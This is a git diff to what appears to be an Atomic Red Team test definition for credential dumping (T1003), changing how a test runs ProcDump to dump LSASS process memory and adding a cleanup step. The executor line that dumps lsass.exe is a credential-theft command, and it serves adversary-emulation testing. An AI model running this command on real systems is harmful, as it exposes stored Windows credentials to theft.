diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index d7e014b1..246ca7e1 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -89,16 +89,22 @@ atomic_tests:
     - windows
 
   input_arguments:
+    procdump_binary_path:
+      description: Path of the ProcDump binary
+      type: string
+      default: $PathToAtomicsFolder\T1003\bin\procdump64.exe
     output_file:
       description: Path where resulting dump should be placed
       type: Path
-      default: lsass_dump.dmp
+      default: C:\Windows\Temp\lsass_dump.dmp
 
   executor:
     elevation_required: true
     name: command_prompt
     command: |
-      procdump.exe -accepteula -ma lsass.exe #{output_file}
+      #{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
+    cleanup_command: |
+      rm "#{output_file}"
 
 - name: Dump LSASS.exe Memory using Windows Task Manager
   description: |